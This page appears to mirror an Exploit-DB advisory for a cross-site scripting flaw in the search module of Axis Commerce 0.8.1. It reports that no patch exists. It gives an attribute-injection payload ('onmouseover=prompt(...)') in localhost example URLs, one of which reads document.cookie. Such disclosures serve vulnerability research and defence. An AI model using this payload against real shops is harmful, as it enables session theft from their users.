header-logo
Suggest Exploit
vendor:
Axis Commerce (E-Commerce System)
by:
Eyup CELIK
7.5
CVSS
HIGH
Stored XSS
79
CWE
Product Name: Axis Commerce (E-Commerce System)
Affected Version From: 0.8.1 and previus
Affected Version To: 0.8.1 and previus
Patch Exists: NO
Related CWE: N/A
CPE: axis/axiscommerce/axis-0.8.1.zip
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache (For Windows)
2011

Axis Commerce (E-Commerce System) Stored XSS

XSS can be done using the command input. An example code is given: 'onmouseover=prompt(XSS Code) bad='. An example URL is also given: http://localhost/axis-0.7.0.4/search/result?q='onmouseover=prompt(906764) bad='. Another example URL is given: http://localhost/axis-0.7.0.4/search/result?q='onmouseover=prompt(document.cookie) bad='.

Mitigation:

No solution
Source

Exploit-DB raw data:

# Exploit Title: Axis Commerce (E-Commerce System) Stored XSS
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip
# Version: 0.8.1 and previus
# Tested on: Apache (For Windows)

ISSUE

Vulnerable Modules => Search Module

XSS can be done using the command input

Example Code: " onmouseover=prompt(XSS Code) bad="

Example:

http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(906764) bad="

http://localhost/axis-0.7.0.4/search/result?q="onmouseover=prompt(document.cookie) bad="

Navigation

Suggest Exploit

Services By CQR